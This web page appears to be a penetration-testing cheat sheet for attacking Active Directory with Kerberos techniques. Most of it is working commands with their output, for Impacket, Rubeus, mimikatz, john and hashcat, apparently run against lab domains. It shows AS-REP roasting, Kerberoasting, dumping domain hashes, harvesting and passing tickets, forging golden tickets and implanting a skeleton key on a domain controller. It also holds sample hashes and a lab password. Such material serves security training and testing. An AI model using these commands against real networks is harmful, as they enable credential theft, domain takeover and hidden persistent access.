Skip to content

Active Directory - Exploitation

Type of attacks & requirements

  • Kerbrute Enumeration - No domain access required
  • Pass the Ticket - Access as a user to the domain required
  • Kerberoasting - Access as any user required
  • AS-REP Roasting - Access as any user required
  • Golden Ticket - Full domain compromise (domain admin) required
  • Silver Ticket - Service hash required
  • Skeleton Key - Full domain compromise (domain admin) required

AS-REP Roasting

GetNPUsers.py

GetNPUsers.py : Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

The only thing that's necessary to query accounts is a valid set of usernames.

$ GetNPUsers.py spookysec.local/ -dc-ip 10.10.169.152 -no-pass -usersfile valid_users.lst
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:6f85816183fca475066c51e9261ec717$eafe07ec0e87349f2ab00582d7becda....
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]

Rubeus

PS C:\Users\Administrator\downloads> .\Rubeus.exe asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain          : CONTROLLER.local

[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName         : Admin2
[*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::60bb:a52f:aa60:58c2%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

$krb5asrep$Admin2@CONTROLLER.local:B7BF630F74729DA7BFF9E376941F1568$803D834526CFA761F37AF6FE1E967B7F76729FF7EBC9B4A547ACDE739269650C88BDA0E7EAF8CFB1DEF3D19D10271D9E7AE88A8810CCC559CC44EA579FACA294A1903F3983055E44F8964BA8B8528FAA502B4B27DED4B3EA4A9B6E44
...

Cracking AS-REP hash

Hash :

  • Hashcat ID : 18200
  • Name : Kerberos 5, etype 23, AS-REP
$ john --wordlist=/opt/rockyou.txt --format=krb5asrep asrep.hashes

[...]
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pxxxxxxx        ($krb5asrep$23$admin2@CONTROLLER.LOCAL)
Pasxxxxx        ($krb5asrep$23$user3@CONTROLLER.LOCAL)
2g 0:00:00:00 DONE (2022-02-19 14:02) 100.0g/s 51200p/s 102400c/s 102400C/s 123456..moomoo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

User synchronization

secretsdump.py

An account can have a permission that allows all Active Directory changes to be synced with an account. This includes password hashes. secretsdump.py allows you to retrieve all the passwords synced with the domain controller.

$ secretsdump.py -just-dc 'spookysec.local/backup:backup2517860@10.10.169.152'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94...:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]

TGT Harvesting

Rubeus

PS C:\Users\Administrator\Downloads> echo 10.10.27.87 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
PS C:\Users\Administrator\Downloads> .\Rubeus.exe harvest /interval:30

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Harvesting (with auto-renewal)
[*] Monitoring every 30 seconds for new TGTs
[*] Displaying the working TGT cache every 30 seconds


[*] Refreshing TGT ticket cache (2/16/2022 2:24:55 AM)

  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL
  StartTime             :  2/16/2022 2:21:27 AM
  EndTime               :  2/16/2022 12:21:27 PM
  RenewTill             :  2/23/2022 2:21:27 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEueRiBvsfWfw5vXb+yejoKPQzf8SXoEhLXFQ4p6w+XFFYavlaEHP5JcNEa0/M/5fxsZRQ9frEU89p/NakhpMmoEe...

Kerberoasting

Kerberoasting allows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password. If the service has a registered SPN then it can be Kerberoastable however the success of the attack depends on how strong the password is and if it is trackable as well as the privileges of the cracked service account.

You can use BloodHound to find all Kerberoastable account.

Rubeus

PS C:\Users\Administrator\Downloads> .\Rubeus.exe kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 2


[*] SamAccountName         : SQLService
[*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet             : 5/25/2020 10:28:26 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*$55970F3E577E752C4AF3862B0E336AAF$2C99AE6E2322400632AFDDCD49A56F83D6F0279E5E5A7754E6B6E2E1CD62A4603BD03D5999625F25D178D6A6572F7DBEC6D7A57407E7F343E8EFF6B8DF1ECCCF946F55ADEB22CB9D04E47425AAB62EFA960920E3644F55253420C1...

GetUserSPNs.py

$ GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.190.181 -request                                                             [...]

CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-26 00:28:26.922527  2020-
05-26 00:46:42.467441

CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService 2020-05-26 00:39:17.578393  2020-05-26 00:40:14.671872



$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$controller.local/SQLService*$9c27c3c5bd692413044c5114c83dfc48$6500e8fc7a747f009af4b3c98b08f07c50db3954892bcd1f0a600aad5
...
$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$controller.local/HTTPService*$30f8b71d5d8b32488f11c72ba53433fc$ead6150959e1c10224970d24997a8fc4bf05293d90e589206aa62aa
...

Cracking TGS ticket

$ hashcat -m 13100 -a 0 krb5tgs.hash /opt/rockyou.txt
...
$ john --wordlist=/opt/rockyou.txt --format=krb5tgs krb5tgs.hash
...

After cracking

If the service account is a domain admin :

  • dump NTDS.dit

If the service account is not a domain admin :

  • pivot or escalate
  • password spraying

Pass the Ticket

  • Dump TGT from LSASS memory with mimikatz.
  • The attack allows you to escalate to domain admin if you dump a domain admin's ticket and then impersonate that ticket using mimikatz PTT attack allowing you to act as that domain admin.

Mimikatz

Administrator privilege is required to run mimikatz.

PS C:\Users\Administrator\downloads> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 602549 (00000000:000931b5)
Session           : Network from 0
User Name         : CONTROLLER-1$
Domain            : CONTROLLER
Logon Server      : (null)
Logon Time        : 2/19/2022 4:17:32 AM
SID               : S-1-5-18

         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.LOCAL
[...]

# Tickets in .kirbi will be dump into your current directory.
PS C:\Users\Administrator\Downloads> dir

    Directory: C:\Users\Administrator\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/25/2020   3:45 PM        1263880 mimikatz.exe
-a----        2/19/2022   5:10 AM        1595 [0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
mimikatz # kerberos::ptt [0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi

* File: '[0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK

You now have impersonated the ticket giving you the same rights as the TGT you're impersonating.

PS C:\Users\Administrator\Downloads> klist

Current LogonId is 0:0x517c3

Cached Tickets: (1)

#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/19/2022 4:15:06 (local)
        End Time:   2/19/2022 14:15:06 (local)
        Renew Time: 2/26/2022 4:15:06 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Golden / Silver Ticket Attacks

Silver vs Golden Ticket :

  • Silver ticket is limited to one specific service.
  • Golden ticket has access to any Kerberos service.

KRBTGT vs TGT :

  • A KRBTGT is the service account for the KDC that issues all of the tickets to the clients.
  • A TGT is a ticket to a service account issued by the KDC and can only access a specific service.

Golden ticket attack :

A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain (preferably the domain admin).

  • Golden ticket : dump the krbtgt ticket
  • Silver ticket : dump any service or domain admin ticket

This will provide you with the service/domain admin account's SID (Security Identifier : unique identifier + NTLM hash). You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information.

Mimikatz

PS C:\Users\Administrator\Downloads> .\mimikatz.exe
[...]
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /inject /name:krbtgt    <- name of the account
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6

[...]
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:1103
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-432953485-3795405108-1502158860
User Id   : 1103
Groups Id : *513 512 520 518 519
ServiceKey: 72cd714611b64cd4d5550cd2759db3f6 - rc4_hmac_nt
Lifetime  : 2/19/2022 5:44:07 AM ; 2/17/2032 5:44:07 AM ; 2/17/2032 5:44:07 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF64F9443B8
# <open elevated command prompt with the given ticket in mimikatz.>

Skeleton Key

  • Default hash for a mimikatz skeleton key : 60BA4FCADC466C7A033C178194C03DF6 (= mimikatz)

The skeleton key works by abusing the AS-REQ encrypted timestamps, the timestamp is encrypted with the users NT hash. The domain controller then tries to decrypt this timestamp with the users NT hash, once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and the skeleton key NT hash allowing you access to the domain forest.

Mimikatz

PS C:\Users\Administrator\Downloads> .\mimikatz.exe
[...]
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Access shares :

C:\Users\Administrator\Downloads>net use \\10.10.188.30\admin$ /user:Administrator mimikatz

References